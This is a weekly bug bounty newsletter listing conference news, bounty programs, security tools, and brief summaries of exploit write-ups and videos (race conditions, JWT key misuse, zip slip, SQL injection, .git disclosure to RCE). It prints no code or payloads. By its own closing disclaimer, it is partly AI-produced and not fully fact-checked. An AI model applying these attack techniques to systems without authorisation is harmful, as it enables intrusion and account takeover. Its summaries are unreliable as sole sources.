Disclosed. July 20, 2025. DEF CON 33 Badge Pre-Orders, Bug Bounty Village Agenda, HackAICon Announcement, NullCon Scholarships, Caido Acquires Shift, and More

Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.

Shout out to this week’s winners (I will email you):

1hehaq
vasanthabalanak
tokjaygopal

PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.

Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️

Limited Edition Bug Bounty Village Badge Pre-Orders [🔗 Tweet]
by Bug Bounty Village

Pre-orders for the exclusive DEFCON 33 badge are now available. Don’t miss your chance to order online before they sell out. This is a huge way to support our village and get something dope in return.
Pre-Order Now → 

Caido Acquires Shift Plugin, Now Free for Users [🔗 Tweet]
by Caido

Caido has acquired the Shift Plugin, now free for paid users, enhancing their toolkit with features like payload crafting and HTTPQL queries.
Read more →

Bug Bounty Village at DEF CON 33 Agenda Released [🔗 Tweet]
by Bug Bounty Village

The agenda for Bug Bounty Village at DEF CON 33 has been published, highlighting speakers, sessions, and networking opportunities.
Read more →

HackAICon 2025 Announced [🔗 Tweet]
by André Baptista

On September 25, 2025, at Lisbon’s LX Factory, HackAICon 2025 brings together hackers, OffSec pros, and researchers to explore how AI can secure the internet. With talks, workshops, hacking challenges, and networking.
Read more →

Have something you want to Spotlight? Tell me.

Bug Bounty Hunter Scholarship at Nullcon Berlin 2025 [📓 Form]
by NullCon

Nullcon Berlin 2025 is offering a Bug Bounty Hunter Scholarship, providing selected applicants with a free conference pass to attend talks, workshops, CTFs, and networking events on 4–5 September 2025. Applicants must submit their details and experience by 28 July 2025.
Read more →

Join New Bug Bounty Program with Up to $5,000 Rewards [🔗 Tweet]
by HackenProof

No Ones App launches a bug bounty program offering rewards from $150 to $5,000 based on severity, inviting immediate researcher engagement.
Read more →

New Microsoft Domains Added for Identity Bug Bounty [🔗 Tweet]
by xss0r

Six new domains have been added to Microsoft's Identity Bug Bounty program, with significant rewards for XSS vulnerabilities based on impact and report quality.
Read more →

Highlights from the Live Hacking Event at leHACK 2025 [🔗 Tweet]
by YesWeHack ⠵

A video recap from leHACK 2025 showcases engaging activities and highlights from this year's event.
Read more →

Did I miss an important update? Tell me.

Introducing PwnFox for Enhanced Burp Suite Testing  [🔗 Tool]
by BApp Store

PwnFox enhances multi-session testing in Burp Suite by enabling multiple Chromium profiles, featuring color-coded traffic and isolated sessions for better usability.
Read more →

Revolutionize Hacking with Custom Actions for AI Payloads [🔗 Tool]
by Gareth Heyes ‼

Automate request rewrites and generate payloads with Custom Actions, enhancing offensive automation techniques.
Read more →

New JXScout Pro Release Improves VSCode Asset Navigation  [🔗 Tool]
by Francisco Neves

The latest JXScout Pro release enhances navigation in VSCode, revealing additional JavaScript files not visible in browsers.
Read more →

Bug Bounty Recon Toolkit  [🔗 Tool]
by adce626
Introducing the ADCE626 Bug Bounty Toolkit, a resource that enables users to generate reconnaissance commands based on target domains, supporting over 50 tools for various techniques.
Read more →

Restore HackerOne's Classic Look with New Chrome Extension [🔗 Tool]
by Ali Tütüncü

A new Chrome extension restores HackerOne's classic interface, offering improved usability for users preferring the previous design.
Read more →

XSS Gym - Train your XSS Muscles [🔗 Tool]
by KNOXSS

The XSS Gym platform provides hands-on training for Cross-Site Scripting vulnerabilities, featuring code examples and additional resources for practice and learning.
Read more →

Have a favorite tool? Tell me.

From .git Disclosure to Remote Code Execution & More - Blog - Sudarshana [📓 Blog]
by Unknown author
Chronicling a bug bounty investigation that progressed from a .git disclosure to a remote code execution vulnerability, detailing the exploitative techniques and tools used.
Read more →

Break into any Microsoft building: Leaking PII in Microsoft Guest Check-In | blog.faav.top [📓 Blog]
by Unknown author
This write-up outlines a vulnerability in Microsoft's Guest Check-In system that exposes PII, detailing the methods used to exploit the issue using Burp Suite.
Read more →

HackerOne | Report #1577940 - Banned user still has access to their deleted account via HackerOne's API using their API key [📓 Blog]
by Unknown author
Documenting a critical vulnerability that allows banned users to retain access to their deleted accounts via HackerOne's API, emphasizing risks related to improper access controls.
Read more →

Did I miss an important update? Tell me.

Race Condition on Reddit’s Coin Purchase API  [🎥 Video]
by DeadOverflow

This video explains a race condition vulnerability in Reddit’s Android app that let a researcher inflate purchased coins by sending multiple parallel requests before the transaction ID was invalidated. The flaw allowed getting more coins than paid for, yet Reddit classified it as medium severity and awarded only $500, sparking debate over its true impact.
Watch video →

Stop Ignoring These Business Logic Issues! [🎥 Video]
by Medusa

Discussing various types of business logic vulnerabilities that have led to real bug bounty payouts, highlighting their implications.
Watch video →

This Tiny JWT Mistake = Massive Bug Bounty [🎥 Video]
by NahamSec

This video explains how attackers exploit JSON Web Tokens (JWTs) through techniques like weak secret cracking, algorithm confusion, and misconfigured dev environments. The creator demonstrates a real-world case where a dev JWT worked on production because both shared the same signing key, enabling account takeover — highlighting how small JWT misconfigurations can lead to serious security breaches and big bounties.
Watch video →

Hack. Hustle. Repeat. with NahamSec | SecMeet 0x04 [🎥 Video]
by Amr Elsagaei (AmrSec)

AmrSec interviews NahamSec about starting in bug bounties, overcoming plateaus, going full-time, financial discipline, and building a meaningful personal brand in hacking.
Read more →

Exploiting Zip Slip Vulnerabilities in File Uploads [🎥 Video]
by BePractical

This video shows how to exploit a zip slip vulnerability in web apps that extract user-uploaded zip files, by crafting malicious file paths to overwrite or escape the intended directory. The creator demonstrates the attack with a Python script and highlights the risks of poor path validation.
Watch video →

How I got my First Bounty in a Billion-Dollar Company [🎥 Video]
by Magn4

The creator shares how they earned their first $100 bug bounty by manually discovering an open redirect vulnerability on a heavily tested program. They also demonstrate the vulnerability in a simulated lab, offer advice to beginners, and encourage viewers to join the community and watch more educational content.
Read more →

Critical Thinking Ep. 131 – Hacks, Secrets, and Bug Bounty Insights [🎥 Video]
by Critical Thinking Bug Bounty Podcast

Live hackalongs, SSRF & IDOR bugs, GitHub orphaned secrets, Google’s prompt-injection defense, niche hacking strategies, and why contributing back matters.
Read more →

Did I miss something? Tell me.

Comprehensive Guide to Detecting SQL Injection Vulnerabilities [🔗 Tweet]
by Muqsit 𝕏

This guide explains how to find SQL injection vulnerabilities using both manual methods (like error-based and boolean tests) and automated tools (like sqlmap and Burp Suite). It also covers SQL basics, web app spidering, and practicing safely with labs like WebGoat and Juice Shop to prepare for real bug bounty hunts.
Read more →

How to find bugs on a hardened target using gadgets [📓 Blog]
by BugCrowd

This article guides readers through finding and exploiting minor vulnerabilities on hardened targets, emphasizing reconnaissance and chaining exploits for higher impact.
Read more →

Recon to Master: The Complete Bug Bounty Checklist [📓 Blog]
by CoffinXP

A comprehensive bug bounty checklist focusing on advanced reconnaissance techniques and tools critical for vulnerability discovery.
Read more →

GitHub dorking for beginners: How to find more vulnerabilities using GitHub search [📓 Blog]
by Intigriti

Teaching the basics of GitHub dorking to uncover vulnerabilities, including practical search patterns for discovering sensitive data.
Read more →

Malware Sample Shows Prompt Injection Attempt by Threat Actor [🔗 Tweet]
by Clint Gibler

Check Point Software reveals a prompt injection attempt in malware that misleads detection systems, demonstrating its potential impact.
Read more →

Did I miss something? Tell me.

Don't Overlook Bug Bounty Opportunities Based on Report Counts [🔗 Thread]
by Gospel

Encouraging bug bounty hunters to consider targets with numerous reports, as valuable vulnerabilities may still exist.
Read more →

Explore Upcoming Chrome Features for Security Bypasses [🔗 Tweet]
by André Baptista

Discussing Google’s upcoming Chrome features that could assist in discovering new security bypasses.
Read more →

Success at SteelCon: First Bug Found and Critical Auth Bypass [🔗 Tweet]
by Nathan Jones

Recapping a successful bug bounty gathering where participants discovered a critical authentication bypass bug.
Read more →

Top 3 Highly Rewarded Exploitable Vulnerabilities [🔗 Thread]
by Intigriti

A detailed thread sharing three easy-to-exploit vulnerabilities that often yield significant bounty payouts.
Read more →

Five Tips to Start Your Cybersecurity Career [🔗 Thread]
by bugcrowd

Offering five expert tips for breaking into the cybersecurity field, aimed at newcomers with no prior experience.
Read more →

Did I miss something? Tell me.

Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.